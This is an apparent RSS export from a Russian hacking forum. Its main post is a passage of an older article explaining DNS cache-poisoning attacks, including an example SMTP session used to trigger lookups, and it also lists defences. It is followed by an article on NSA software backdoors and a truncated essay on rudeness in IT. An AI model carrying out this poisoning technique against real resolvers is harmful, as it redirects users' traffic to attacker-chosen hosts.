последующих запросов и минимизации сетевого трафика. 2. Межсегментная удаленная атака на DNS-сервер Возможность атаки на DNS путем фальсификации ответа DNS-сервера известна довольно давно (см., например, Медведовский И.Д., Семьянов П.В., Платонов В.В. Атака через Internet. - СПб.: &amp;quot;Мир и семья-95&amp;quot;, 1997.). Объектом атаки может являться как резолвер, так и DNS-сервер. Причины успеха подобных атак кроются в легкости подделки ответа сервера. Протоколы DNS, используемые в настоящее время, не предусматривают каких либо средств проверки аутентичности полученных данных и их источника, полностью полагаясь в этом на нижележащие протоколы транспортного уровня. Используемый транспортный протокол (UDP) с целью повышения эффективности не предусматривает установления виртуального канала и использует в качестве идентификатора источника сообщения IP-адрес, который может быть элементарно подделан. При наличии у атакующего возможности перехвата сообщений, которыми обмениваются клиент и сервер (внутрисегментная атака) реализация атаки не представляет каких либо трудностей. Однако этот вариант не представляет и значительного практического интереса, поскольку возможность внутрисегментной атаки предполагает наличие определенного взаимного расположения клиента, сервера и хоста атакующего (например, атакующий и целевой DNS-сервер разделяют общую физическую среду передачи), что на практике реализуется довольно редко. Значительно более общим случаем является межсегментная атака, не требующая для своей реализации столь жестких условий. По этой причине мы остановимся на рассмотрении именно этого класса удаленных атак, представляющих как академический, так и практический интерес. Межсегментная атака на DNS-сервер выглядит следующим образом. Предположим для определенности, что целью атаки является &amp;quot;подмена&amp;quot; IP-адреса web-сервера wwwcoolsite.com на IP-адрес сервера wwwbadsite.com для пользователей некоторой подсети, которую обслуживает DNS-сервер ns.victim.com. В первой фазе атаки ns.victim.com провоцируется на поиск информации о IP-адресе wwwcoolsite.com путем посылки ему соответствующего рекурсивного запроса. Во второй фазе атакующий посылает серверу ns.victim.com ложный ответ от имени ns.coolsite.com, который является ответственным за домен coolsite.com. В ложном ответе вместо реального IP-адреса wwwcoolsite.com указывается IP-адрес wwwbadsite.com. Сервер ns.victim.com кэширует полученную информацию, в результате чего в течении определенного промежутка времени (величина этого промежутка указывается в поле TTL ложного ответа и может произвольно выбираться атакующим) ничего не подозревающие пользователи вместо сервера wwwcoolsite.com попадают на wwwbadsite.com. Для того, чтобы ложный ответ был воспринят сервером ns.victim.com как истинный, достаточно выполнения четырех условий: · IP адрес отправителя ответа должен соответствовать IP-адресу запрашиваемого сервера (в нашем случае ns.coolsite.com); · UDP-порт, на который направляется ответ, должен совпадать с портом, с которого был послан запрос; · идентификатор ответа должен совпадать с идентификатором запроса; · ответ должен содержать запрашиваемую информацию (в нашем случае IP-адрес web-сервера wwwcoolsite.com). Очевидно, что выполнение первого и четвертого условий не представляет для атакующего особых трудностей. Со вторым и третьим условиями ситуация намного сложнее, поскольку в случае межсегментной атаки у атакующего нет возможности перехватить исходный запрос и &amp;quot;подсмотреть&amp;quot; необходимые параметры. Большинство используемых в настоящее время реализаций DNS-сервера (BIND4, MS DNS) используют для исходящих запросов 53 порт, так что можно &amp;quot;на удачу&amp;quot; послать ложный ответ на этот порт. Однако данный метод будет срабатывать не всегда, поскольку, например, BIND8 может использовать для исходящих запросов любой случайно выбранный непривилегированный порт. Идентификатор (id) запроса представляет собой двухбайтовое число, указываемое сервером в запросе с целью однозначной идентификации ответа на данный запрос. Это число инкрементируется с каждым новым запросом. Незнание текущего значения идентификатора приводит к необходимости посылки множества ложных ответов с различными значениями id. Именно это обстоятельство делает практическую реализацию данной атаки очень трудноосуществимой. Действительно, ложный ответ должен быть получен целевым сервером в промежуток времени с момента посылки запроса и до момента прихода ответа от настоящего сервера, что на практике составляет не более нескольких секунд. За этот интервал времени атакующему необходимо послать 216 ложных ответов со всеми возможными значениями id, а в случае незнания порта эта цифра увеличивается еще в несколько десятков раз. Поскольку размер IP-пакета, содержащего ложный ответ, составляет около 100 байт, то перед атакующим ставится задача пересылки нескольких мегабайт информации за несколько секунд, что в подавляющем большинстве случаев неосуществимо. 3. Метод определения номера порта и текущего идентификатора запроса При выполнении дополнительного условия даже в случае межсегментной атаки у атакующего есть возможность определения текущего id запроса и номера порта. Таким условием является наличие контролируемого атакующим DNS-сервера, ответственного за любой домен. Контроль над сервером в данном контексте означает возможность перехвата всех запросов, адресованных данному серверу. Это возможно либо если атакующий непосредственно владеет сервером (является его администратором), либо разделяет с ним общую физическую среду передачи (в случае ethernet это означает нахождение в одном коллизионном домене). Очевидно, что данное условие не является слишком жестким, поскольку нахождение в одном коллизионном домене с DNS-сервером достаточно типично для многих пользователей корпоративных сетей. При наличии контролируемого сервера описанная атака может быть модифицирована следующим образом. Предположим для определенности, что атакующий контролирует сервер ns.hacker.com, ответственный за домен hacker.com. В первой фазе атаки мы провоцируем сервер ns.victim.com на обращение к ns.hacker.com путем посылки рекурсивного запроса на поиск информации о любом имени (не обязательно реальном) в домене hacker.com. Поскольку ns.hacker.com находится под контролем атакующего, он может перехватить этот запрос и извлечь из него информацию о номере порта и текущем id. Последующие две фазы атаки не отличаются от описанных, с той лишь разницей, что теперь атакующему достаточно послать всего несколько ложных ответов, поскольку он точно знает номер порта и может с высокой степенью точности предсказать значение идентификатора запроса к ns.coolsite.com. 4. Метод косвенной провокации Очевидно, что необходимым условием успешности описанной атаки является возможность посылки рекурсивных запросов целевому серверу, провоцирующих его на обращение к другим серверам с целью поиска запрашиваемой информации. В принципе, существует возможность настроить DNS-сервер таким образом, что он будет принимать рекурсивные запросы только от &amp;quot;своих&amp;quot; клиентов (хостов, резолверы которых настроены на использование данного сервера). В этом случае осуществление атаки становится невозможным. С целью обхода этого ограничения можно предложить простой метод, который условно назовем &amp;quot;косвенной провокацией&amp;quot;. Основная идея этого метода заключается в использовании любого общедоступного сервиса, являющегося клиентом целевого DNS-сервера, для формирования необходимого провоцирующего запроса. Наиболее подходящим кандидатом представляется общедоступный сервер электронной почты, который по определению должен принимать соединения с любого компьютера Internet. Предположим, что резолвер компьютера mail.victim.com настроен на использование сервера ns.victim.com, причем последний принимает рекурсивные запросы только от домена victim.com. Приведенный ниже SMTP-диалог провоцирует ns.victim.com на поиск информации о имени any-name.any-domain.com: $ telnet mail.victim.com 25 Trying... Connected to mail.victim.com. Escape character is &#039;^]&#039;. 220 mail.victim.com ESMTP Sendmail 8.8.0/8.8.0; Wed, 5 May 1999 21:30:42 helo I.am.cracker 250 mail.victim.com Hello crack.hacker.com [1.1.1.1], pleased to meet you mail from: user@any-name.any-domain.com 250 user@any-name.any-domain.com... Sender ok quit 221 mail.victim.com closing connection Connection closed. Таким образом, применение метода &amp;quot;косвенной провокации&amp;quot; позволяет осуществить атаку без прямой посылки запросов целевому DNS-серверу. 5. Как возникают эпидемии В обычных условия успешная атака приводит к &amp;quot;заражению&amp;quot; кэша конкретного сервера и область распространения ложной информации ограничивается только его клиентами. Однако при наличии ситуации &amp;quot;некорректного делегирования&amp;quot; (lame delegation), возникающей из-за ошибок администрирования, возможно распространение ложной информации на другие сервера, что приведет к глобальному &amp;quot;заражению&amp;quot;. Под некорректным делегированием понимается ситуация, когда ответственность за домен делегируется серверу, не обладающему локальной копией доменной информации. Это приводит к тому, что в ответ на итеративные запросы других серверов вместо искомой информации он возвращает ссылки на другие сервера (иногда и на себя), которые, с точки зрения данного сервера, располагают нужными сведениями. Рассмотрим ситуацию, когда для домена victim.com существуют два ответственных сервера - ns.victim.com и ns2.victim.com, причем для ns2.victim.com делегирование выполнено некорректно. Применяя описанные методы, атакующий может &amp;quot;заразить&amp;quot; кэш сервера ns2.victim.com ложной информацией о именах в домене victim.com, например, подменить IP-адрес web-сервера wwwvictim.com на IP-адрес wwwvery-bad-site.com. Поскольку ns2.victim.com считается ответственным за домен victim.com, другие сервера в Internet будут обращаться к нему за информацией о именах в этом домене. Не располагая локальной копией доменной информации о victim.com, данный сервер будет возвращать в ответ ранее кэшированную ложную информацию, приводя к &amp;quot;заражению&amp;quot; всех обратившихся к нему серверов. Неприятной особенностью данного сценария является невозможность быстрой ликвидации последствий атаки, поскольку ложная информация будет находиться в кэшах тысяч серверов до истечения времени жизни, которое атакующий может выбрать очень большим. 6. Реализация и полевые испытания Программа, реализующая атаку на DNS-сервер с использованием контролируемого сервера, стала доступна в Internet примерно в феврале 1999 года. К счастью, использование этой программы не сводится к вводу в окошко IP-адреса целевого сервера и нажатию кнопки &amp;quot;Infect It!&amp;quot;, а требует достаточно глубокого понимания принципов работы DNS, что сразу же отсеивает 99% потенциальных пользователей. Кроме того, в известной автору реализации сделано далеко не все для повышения вероятности успеха атаки. С целью обеспечения чистоты эксперимента &amp;quot;полевые испытания&amp;quot; были проведены на трех неподконтрольных автору корпоративных сетях. Естественно, администраторы этих сетей были поставлены в известность и не возражали против проведения эксперимента. Как это ни печально, во всех трех случаях атака была успешной. Диапазон целей, которые могут быть достигнуты при помощи атаки на DNS, простирается от &amp;quot;отказа в обслуживании&amp;quot; и подмены web-сайтов до перехвата сообщений электронной почты и полного контроля над информацией, передаваемой между произвольно выбранными хостами Internet. При всем этом атакующий практически не оставляет следов, поскольку ему нет необходимости посылать провоцирующие запросы и ложные ответы с собственного IP-адреса. 7. Взгляд с другой стороны баррикады По мнению автора, в настоящее время единственным надежным средством противодействия описанной атаке является использование стандартизированных в RFC2065 расширенных протоколов DNS, предусматривающих применение криптографических методов аутентификации доменной информации и субъектов сетевого взаимодействия. Базовая поддержка этого стандарта уже включена в текущую версию BIND8. К сожалению, желаемый результат может дать только широкомасштабное внедрение новых протоколов, которое сопряжено со значительными организационными трудностями и не может быть проведено за короткое время. Несколько затруднить осуществление атаки может запрет на обслуживание DNS-сервером рекурсивных запросов, поступающих не от &amp;quot;своих&amp;quot; клиентов. Это может быть сделано как средствами самого сервера (например, BIND8 обладает такими возможностями), так и средствами межсетевого экрана. Следует обратить внимание на настройку &amp;quot;антиспуффинговых&amp;quot; правил фильтрации на межсетевом экране, поскольку атакующий в качестве IP-адреса отправителя запроса может указать любой адрес, в том числе и легального клиента. При использовании данного метода не следует забывать, что подобная защита может быть достаточно легко преодолена использованием описанного метода косвенной провокации. Заключение В отличие от уже набивших оскомину атак, использующих &amp;quot;дыры&amp;quot; в конкретных реализациях сетевых сервисов, ошибки администрирования или методы &amp;quot;социальной инженерии&amp;quot;, атака на DNS представляется автору очень изящной. В то же время по характеру и масштабности результатов данная атака вполне может быть причислена к информационному оружию массового поражения. Отсутствие адекватных средств защиты, очень слабо выраженные следы и трудность устранения последствий атаки еще больше усугубляют ситуацию. Несколько удивляет тот факт, что данная удаленная атака широко не применяется взломщиками (по крайней мере, автор не располагает такой информацией). Вполне возможно, это объясняется просто недостаточной квалификацией подавляющего числа людей, называющих себя хакерами. Сетевым администраторам остается только надеяться, что уязвимость протоколов DNS к данной атаке будет устранена прежде, чем они почувствуют на себе ее последствия.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Wed, 05 Aug 2009 12:34:21 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=17#p17</guid>
		</item>
		<item>
			<title>АНБ знает все секреты Интернета</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=16#p16</link>
			<description>&lt;p&gt;Курт Сабо &lt;/p&gt;
						&lt;p&gt;В последнее время появляется все больше свидетельств того, что Агентство национальной безопасности США имеет возможность узнать секреты практически любого пользователя Интернета. Бывший сотрудник агентства, а ныне известный правозащитник, Уэйн Мэдсон заявил на прошедшей в Англии международной конференции по проблемам неприкосновенности частной жизни, что огромное число коммерческих программ для ПК имеют специально встроенные “черные ходы”, позволяющие спецслужбам проводить свои операции. “Многие производители программного обеспечения нашли общий язык с АНБ, - говорит он. - Это именно та область, которая всегда привлекала внимание спецслужб”.&lt;/p&gt;
						&lt;p&gt;АНБ, численность сотрудников которого составляет около 40 000 человек, напряженно работает над тем, чтобы средства защиты информации, используемые правительством США, совершенно не поддавались взлому. С другой стороны, оно всячески стремится к тому, чтобы ослабить экспортные версии криптографических программ американских компаний. Например, агентство тратит массу времени и усилий на то, чтобы заставить производителей программного обеспечения, а также коммутаторов и маршрутизаторов внести в выпускаемую продукцию требуемые изменения. Цель предельно проста – гарантировать правительству США свободный доступ к чужим шифрованным данным. &lt;/p&gt;
						&lt;p&gt;Как известно, АНБ проводит операции по сбору разведывательной информации в интересах американского правительства. Оно осуществляет перехват данных и из трафика Интернета. Для того чтобы все проходило без проблем, требуется “небольшая” подготовительная работа. Например, программисты могут при написании исходного кода приложений включить туда модули, реализующие некие недокументированные возможности. Причем такие вставки очень трудно обнаружить. Некоторые софтверные компании, в том числе Microsoft, ранее уже обвинялись прессой в сотрудничестве с АНБ, так как пошли на включение в свои программы специальных “черных кодов”. Аналогичный случай, возможно, имел место с программой PGP, когда в ней был обнаружен очень серьезный дефект. Эта программа обычно применяется для шифрования электронной почты. Чтобы понять, как же люди из АНБ “портят” чужие программы, обратимся к предыстории этого события.&lt;/p&gt;
						&lt;p&gt;Известный криптограф Брюс Шнайер еще в прошлом году поведал читателям ежемесячного электронного бюллетеня о некоем таинственном сотруднике АНБ Лью Джайлзе, занимавшемся исключительно тем, что заставлял производителей ослаблять защиту, которую должны были обеспечить выпускаемые ими программные средства. В конце концов, говорил он, всегда можно все “дыры” в защите объяснить случайно допущенными ошибками. Именно в это время в PGP и была введена функция “восстановления ключа”, имевшая скрытый дефект, который стал недавно широко известен. Впоследствии в различных версиях этой программы были обнаружены и другие серьезные недостатки. Например, оказалось, что в версии PGP для Linux и OpenBSD вырабатываются слабые ключи. Эти программы, по сообщениям Bugtraq, были созданы как раз в 1997 году. &lt;/p&gt;
						&lt;p&gt;Конечно, большинство обнаруженных дефектов в программах появляется всего лишь по недосмотру разработчиков. Но очень вероятно и то, что некоторые из них являются специально внедренными “черными ходами”. В различных средствах массовой информации время от времени публикуется информация, полученная от сотрудников компаний по производству компьютерной техники и ПО, о том, как их “обрабатывало” АНБ. Крупнейшие агентства новостей CNN и Network World рассказали о том, как АНБ заставляло фирмы, производящие сетевое оборудование, вносить в выпускаемую продукцию изменения в своих интересах. К компаниям, сотрудничающим с АНБ, хотя и не всегда с охотой, относятся, например, Netscape, Sun, Microsoft. Один из сотрудников фирмы Sun Крис Толлес говорит, что все в Силиконовой долине, в том числе и сотрудники этой фирмы, были вынуждены сотрудничать с АНБ. Но если все компании работали с АНБ, то осталась ли вообще какая-либо “неиспорченная” продукция?&lt;/p&gt;
						&lt;p&gt;Еще в 1995 году это ведомство заинтересовалось системами шифрования сообщений электронной почты, используемыми в продукции фирм Microsoft, Netscape и Lotus. Под давлением со стороны АНБ эти компании согласились ослабить защиту своих программных приложений, предназначенных на экспорт. Английский журналист Данкен Кэмпбелл сообщает, что АНБ добилось успеха в компрометировании броузеров Microsoft, Netscape и пакета Lotus Notes. Это ведомство настояло на сокращении длины ключей шифрования до той величины, при которой оно легко могло взломать код. &lt;/p&gt;
						&lt;p&gt;Тахер Элгамал, реализовывавший “план по восстановлению данных” в Netscape, как того требовало АНБ, сообщил, что у этой компании просто не было никаких шансов избежать подобной участи. Дело в том, что примерно половину доходов Netscape получает от экспорта. Для того чтобы получить экспортную лицензию, требуется разрешение АНБ, а это возможно только в случае ослабления продаваемой продукции. И вот выясняется, что хотя в экспортных версиях популярных броузеров Microsoft и Netscape используются ключи длиной 128 бит, 88 бит каждого ключа передаются вместе с зашифрованным сообщением. Поэтому только 40 бит остаются секретными. Поскольку почти на каждом компьютере в Европе установлены эти броузеры, АНБ может легко взломать код и читать секретную переписку пользователей Интернета.&lt;/p&gt;
						&lt;p&gt;АНБ имело также доступ к шифрованной электронной почте пользователей ПО Lotus Notes, поскольку этот программный пакет был специально “подпорчен”. Это было обнаружено шведским правительством в 1997 году и вызвало у него сильный шок. Ранее система Lotus Notes широко использовалась для конфиденциальной переписки членами парламента Швеции, многочисленными ведомствами и отдельными гражданами этой страны. Как такое стало возможным? Дело в том, что в систему защиты электронной почты Lotes Notes, предназначенной для экспорта, был включен модуль, дающий АНБ доступ к шифрованным данным. Это превращало задачу по вскрытию секретных сообщений в дело нескольких секунд. Даже сама компания Lotus призналась в этом. Вот что она сообщила газете Svenska Dagbladet: “Разница между американской версией Notes и экспортной заключается только в степени защиты. Всем пользователям мы предоставляем 64-битные ключи, но 24 бита ключа экспортной версии программы предоставляются американскому правительству”.&lt;/p&gt;
						&lt;p&gt;АНБ добралось и до систем защиты банковских сетей. Когда компания MasterCard International вырабатывала стандарт шифрования SET, используемый сейчас в электронных транзакциях, АНБ быстро охладило ее энтузиазм. “Они сообщили нам, что можно и что нельзя делать”, - сказал Джон Ванкмюллер, отвечающий в компании за электронную коммерцию. АНБ настояло на том, чтобы большая часть информации при каждой транзакции вообще не шифровалась. В США хотят знать, кто и куда переводит деньги.&lt;/p&gt;</description>
			<author>mybb@mybb.ru (admin)</author>
			<pubDate>Tue, 04 Aug 2009 16:49:49 +0400</pubDate>
			<guid>http://hackzona.youbb.ru/viewtopic.php?pid=16#p16</guid>
		</item>
		<item>
			<title>Агрессия</title>
			<link>http://hackzona.youbb.ru/viewtopic.php?pid=15#p15</link>
			<description>&lt;p&gt;Денис Чекалов, кандидат философских наук&lt;/p&gt;
						&lt;p&gt;Агрессия в компьютерном мире! При этих словах сразу же вспоминаешь о взломах,&lt;br /&gt;совершенных хакерами, или о вирусах, что так и жаждут просочиться на твой компьютер.&lt;br /&gt;Программы-бомбы (&amp;quot;ньюки&amp;quot;), твой сервер, упавший оттого, что кто-то подпилил ему ножки,&lt;br /&gt;- стоит только включить модем, и тебе открывается мир, полный готовых высыпаться&lt;br /&gt;неприятностей.&lt;/p&gt;
						&lt;p&gt;Но идет ли речь только о взломах и вирусах? Нет, конечно. За взломами и вирусами стоит&lt;br /&gt;человек - что же делает его таким злым?&lt;/p&gt;
						&lt;p&gt;Не станем, конечно, углубляться в вечные философские вопросы. Какова природа человека,&lt;br /&gt;что заставляет его причинять боль себе и ближним, - пусть ученые ломают головы над&lt;br /&gt;этими проблемами. Если им не жалко своих голов.&lt;/p&gt;
						&lt;p&gt;Поставим перед собой более четкую задачу. Постараемся описать один из типов личности,&lt;br /&gt;рожденной влиянием информационных технологий. Невежливого, колючего человека - не&lt;br /&gt;столько злого, сколько мелко злобного. Уверен, вы не раз сталкивались с такими. И&lt;br /&gt;попытаемся понять, что делает его злым.&lt;/p&gt;
						&lt;p&gt;Люди привыкли к недоброжелательности&lt;/p&gt;
						&lt;p&gt;лость и агрессия не обязательно принимают форму вируса или взлома. В конечном счете,&lt;br /&gt;как бы ни были неприятны подобные сюрпризы, мы сталкиваемся с ними не каждый день - и&lt;br /&gt;слава Богу.&lt;/p&gt;
						&lt;p&gt;Гораздо чаще сталкиваемся мы с другой агрессией - эмоциональной. Не думаю, что открою&lt;br /&gt;для кого-нибудь Америку, если скажу - грубость встречается в компьютерном мире (в том&lt;br /&gt;числе, в Интернете) слишком часто.&lt;/p&gt;
						&lt;p&gt;При этом, грубость, возведенная в форму образа жизни. Приведу несколько примеров.&lt;br /&gt;Объявление о приеме на работу: &amp;quot;Письма с доками будут безжалостно уничтожены&amp;quot;. Или&lt;br /&gt;другое: &amp;quot;Не обращаться [список тех, кто не подходит на должность]. Вас таких сразу&lt;br /&gt;видно&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Почему &amp;quot;безжалостно&amp;quot;? Почему &amp;quot;сразу видно&amp;quot;? Разве сложно говорить вежливо? Сделаю&lt;br /&gt;небольшой прогноз - многие из читателей могли даже не понять, а где здесь, собственно,&lt;br /&gt;грубость. Колючесть, недоброжелательность настолько просочились в наш образ жизни, что&lt;br /&gt;превратились в норму.&lt;/p&gt;
						&lt;p&gt;В Советском Союзе было принято смеяться над американцами - над их &amp;quot;неискренними&lt;br /&gt;улыбками&amp;quot;. Сегодня стало ясно - неискренней улыбке нередко противостоит только&lt;br /&gt;искреннее хамство.&lt;/p&gt;
						&lt;p&gt;Возникает, однако, более сложный вопрос. Да, если человека плохо воспитали в детстве,&lt;br /&gt;то он может стать хамом - тем более, если просочится на руководящую должность. Как ни&lt;br /&gt;печально, так все и происходит.&lt;/p&gt;
						&lt;p&gt;Но откуда злость ко всем вокруг? Обида на весь мир? Ничем иным не удастся объяснить&lt;br /&gt;такую грубость и недоброжелательность. Я недаром привел в качестве примеров именно&lt;br /&gt;объявления о приеме на работу. Можно было бы обратиться к чему-то другому, но&lt;br /&gt;объявления не могут не удивить.&lt;/p&gt;
						&lt;p&gt;В самом деле. Человек ищет сотрудников. Он абсолютный хозяин положения. Кого хочет -&lt;br /&gt;возьмет, остальным откажет. У него власть, у него деньги. А ведь агрессия&lt;br /&gt;свидетельствует о слабости.&lt;/p&gt;
						&lt;p&gt;Злость испытывает тот, кто проиграл, неудачник, обвалянный в грязи и осмеянный толпой.&lt;br /&gt;Победителю, богачу и любимцу удачи незачем злиться. Он может быть негодяем, хамом,&lt;br /&gt;подлецом - но у него нет причин испытывать злость и ненависть.&lt;/p&gt;
						&lt;p&gt;Откуда же они берутся? Откуда стремление сразу поссориться?&lt;/p&gt;
						&lt;p&gt;Почему находятся люди, взявшие за правило принцип: &amp;quot;Нахами первым, пока не нахамили&lt;br /&gt;тебе&amp;quot;?&lt;/p&gt;
						&lt;p&gt;Все дело в том, что наш агрессор испуган.&lt;/p&gt;
						&lt;p&gt;Чем же? У него хорошая работа. Ответственная должность. Высокий оклад. Пусть пугаются&lt;br /&gt;его подчиненные, те, кого он может принять на работу или уволить, пусть злятся и&lt;br /&gt;кусают друг друга - это было бы предосудительно, но понятно.&lt;/p&gt;
						&lt;p&gt;Что пугает нашего злобного, мелочного агрессора? Малость. То, что он не умеет&lt;br /&gt;работать. Он не способен выполнять свои обязанности, и каждую минуту может вылететь со&lt;br /&gt;своего поста.&lt;/p&gt;
						&lt;p&gt;Не умея работать&lt;/p&gt;
						&lt;p&gt;На первый взгляд, кажется невероятным, что некомпетентный человек оказывается на&lt;br /&gt;ответственной должности. И научная логика, и здравый житейский смысл подсказывают, что&lt;br /&gt;работа должна доставаться тому, кто в состоянии ее выполнять.&lt;/p&gt;
						&lt;p&gt;Конечно, бывает всякое. Вакансия может достаться случайному человеку, к тому же,&lt;br /&gt;нередко людей принимают по знакомству - и тем не менее. Если человек не умеет&lt;br /&gt;готовить, ему не удержаться на месте шеф-повара. Не умеет водить автомобиль - роль&lt;br /&gt;таксиста не для него. Какими бы ни были обстоятельства или знакомства.&lt;/p&gt;
						&lt;p&gt;Это совершенно справедливо. Но только не в том случае, когда речь идет о компьютерном&lt;br /&gt;мире.&lt;/p&gt;
						&lt;p&gt;Является закономерным, что работа, связанная с компьютерами, открывает простор для&lt;br /&gt;некомпетентных, безответственных людей.&lt;/p&gt;
						&lt;p&gt;Это похоже на работу полицейского. Большая часть стражей порядка - честные, надежные&lt;br /&gt;люди. Но сам характер профессии таков, что попадись среди них человек с гнильцой - и&lt;br /&gt;его пороки разрастутся пышной плесенью.&lt;/p&gt;
						&lt;p&gt;Не стоит забывать, что подобное положение имеет и противоположную сторону. Те, кто&lt;br /&gt;умеет работать и хочет это делать, нередко оказываются оттесненными в сторону.&lt;br /&gt;Последнее не удивительно - бездельники гораздо лучше умеют громко кричать и&lt;br /&gt;распихивать окружающих локтями.&lt;/p&gt;
						&lt;p&gt;Отчего же это происходит? Почему компьютерная работа позволяет жить и процветать&lt;br /&gt;такого рода людям?&lt;/p&gt;
						&lt;p&gt;В данном случае, речь пойдет только о странах постсоветского пространства. В рамках&lt;br /&gt;разных культур влияние, которое оказывают на человека информационные технологии,&lt;br /&gt;преломляется по-разному, и сейчас у нас нет возможности (да и необходимости тоже)&lt;br /&gt;говорить о всем мире в целом.&lt;/p&gt;
						&lt;p&gt;Возьмем в качестве примера что-нибудь, хорошо известное всем читателям. Хотя бы одну&lt;br /&gt;из крупных компаний, занимающуюся локализацией игр. Не станем называть ее - без&lt;br /&gt;сомнения, в ней работают умные, компетентные люди, которые любят свою работу и&lt;br /&gt;ответственно к ней относятся.&lt;/p&gt;
						&lt;p&gt;Вспомним, однако, один из ее проектов. Речь идет об известной пошаговой стратегии. Что&lt;br /&gt;мы видим? Локализаторы уверенно пишут слово &amp;quot;мэрия&amp;quot; через &amp;quot;е&amp;quot;, а название штата&lt;br /&gt;&amp;quot;Калифорния&amp;quot; оказывается с маленькой буквы. Игра состоит из нескольких частей, которые&lt;br /&gt;переводились отдельно, - и везде мы видим те же ошибки.&lt;/p&gt;
						&lt;p&gt;Название сказочного народа &amp;quot;halfling&amp;quot; можно переводить по-разному. Это может быть и&lt;br /&gt;&amp;quot;полурослик&amp;quot;, и &amp;quot;невысоклик&amp;quot;, и просто &amp;quot;халфлинг&amp;quot;. Но ни в коем случае не &amp;quot;подросток&amp;quot;!&lt;br /&gt;С тем же успехом дракона можно назвать жабой, а единорога козой.&lt;/p&gt;
						&lt;p&gt;Но наш переводчик над этим не задумывается. Не потому, что не знает - просто ему&lt;br /&gt;плевать на качество.&lt;/p&gt;
						&lt;p&gt;Далее. Как уже сказано, игра выходит несколькими отдельными частями. В них участвуют&lt;br /&gt;одни и те же герои. Однако в каждом новом выпуске их имена перевраны по-новому.&lt;br /&gt;Транскрипция имен с другого языка - дело сложное, но сверить финальные результаты не&lt;br /&gt;просто необходимо, это дело чести переводчика.&lt;/p&gt;
						&lt;p&gt;Но чести-то нет.&lt;/p&gt;
						&lt;p&gt;Как принято говорить в подобных случаях - прошу прощения за некоторую вульгарность -&lt;br /&gt;&amp;quot;пипл хавает&amp;quot;. В переводе на нормальный язык, это означает: какой смысл стараться,&lt;br /&gt;если купят и так.&lt;/p&gt;
						&lt;p&gt;Не желая работать&lt;/p&gt;
						&lt;p&gt;В первое время, это срабатывает. Игрок, конечно же, предпочтет переведенную игру&lt;br /&gt;английской (позор, конечно: когда-то мы были великой грамотной страной, а теперь даже&lt;br /&gt;геймер, который, по определению, работает с компьютером и должен знать язык Шекспира&lt;br /&gt;хотя бы чуть-чуть, требует себе локализованную версию).&lt;/p&gt;
						&lt;p&gt;Довольны и западные партнеры. Русского они не знают, проверить ошибки не могут, да им&lt;br /&gt;и плевать. Главное, чтобы деньги шли.&lt;/p&gt;
						&lt;p&gt;Так зачем же стараться? Тяп-ляп, шмяк-бубяк, скорей-скорей: Быстрые деньги, быстрый&lt;br /&gt;оборот. Это нормально, более того - полезно для экономики в целом.&lt;/p&gt;
						&lt;p&gt;Но что происходит с человеком? Он привыкает к тому, что можно работать, спустя рукава.&lt;br /&gt;Более того - он видит, что за такую халтуру ему не просто платят деньги, но еще и&lt;br /&gt;рукоплещут.&lt;/p&gt;
						&lt;p&gt;Происходит сдвиг ценностных ориентаций. Человек не просто привыкает работать плохо. Он&lt;br /&gt;уверен, что так и надо работать. Вспомним многие отечественные &amp;quot;теледетективы&amp;quot;. В свое&lt;br /&gt;время, была очень жестокая песня: &amp;quot;Смесь из грязи и [кое-чего похуже] - это родина&lt;br /&gt;моя&amp;quot;. Конечно, это неправда - по крайней мере, к моей родине подобное не относится. Но&lt;br /&gt;поглядите на телеэкран - и правда, кроме грязи и этого другого, ничего нет.&lt;/p&gt;
						&lt;p&gt;Я даже не говорю о том, что героями нашего времени стали &amp;quot;братки-бандюки&amp;quot; и &amp;quot;чумовые&lt;br /&gt;дамочки&amp;quot;. Речь идет об общей концепции. Посмотрите фильм &amp;quot;Детектив Нэш Бриджес&amp;quot;. Яркие&lt;br /&gt;цвета, красивые съемки, интересные актеры. Сравните что-нибудь российское -&lt;br /&gt;заплеванные подъезды, грязные улицы, обшарпанные кабинеты.&lt;/p&gt;
						&lt;p&gt;&amp;quot;Правда жизни&amp;quot;? Отнюдь. Я не верю, что в Москве можно снимать только грязь и&lt;br /&gt;обделанные заборы. К счастью, есть режиссеры, которые это понимают, но их слишком&lt;br /&gt;мало.&lt;/p&gt;
						&lt;p&gt;Большинство исповедуют другой принцип. Зачем стараться, искать красивые пейзажи,&lt;br /&gt;организовывать съемки. Наверти кадры в ближайшей подворотне, и гони новую серию.&lt;br /&gt;Пирожок с грязью вместо паштета? Ну и что. Пипл же хавает!&lt;/p&gt;
						&lt;p&gt;Таково мировоззрение этих людей. Они отучились работать хорошо. Слово &amp;quot;качество&amp;quot; для&lt;br /&gt;них ничего не значит. И в то же время, они твердо уверены, что представляют собой&lt;br /&gt;&amp;quot;цвет нации&amp;quot;.&lt;/p&gt;
						&lt;p&gt;Рассмотрим теперь, что происходит далее. Принцип &amp;quot;пипл хавает&amp;quot; не может работать&lt;br /&gt;вечно. У Марка Твена есть небольшой эпизод об &amp;quot;артистах&amp;quot;, которые вместо представлений&lt;br /&gt;бессовестно обманывали публику.&lt;/p&gt;
						&lt;p&gt;Они хорошо знали: на первое представление придут те, кто им поверил. На втором они&lt;br /&gt;уже, само собой, не покажутся, но наберется столько же новых зрителей.&lt;/p&gt;
						&lt;p&gt;А с третьего, шапку в охапку, и бегом, пока разгневанная публика не намылила&lt;br /&gt;физиономий.&lt;/p&gt;
						&lt;p&gt;Вот этого наш &amp;quot;испуганный агрессор&amp;quot; и не умеет. Он привык к тому, что его хвалят за&lt;br /&gt;халтуру. Когда этого не происходит, он умеет вовремя сбежать. Ведь он не ощущает себя&lt;br /&gt;мошенником, как создатели экономической пирамиды, - он искренне думает, что заслужил&lt;br /&gt;фанфары.&lt;/p&gt;
						&lt;p&gt;Обратимся за примером к другой отрасли, тесно связанной с компьютерами, -&lt;br /&gt;издательской. Почему именно к ней? Она интересует нас в первую очередь. Если&lt;br /&gt;разработчики программ или телестудии (мы говорим о нашей стране) начали свою&lt;br /&gt;деятельность сравнительно недавно - то частные книгоиздатели существуют уже давно, и&lt;br /&gt;успели пожать печальные плоды принципа &amp;quot;пипл хавает&amp;quot;.&lt;/p&gt;
						&lt;p&gt;И злясь на весь мир&lt;/p&gt;
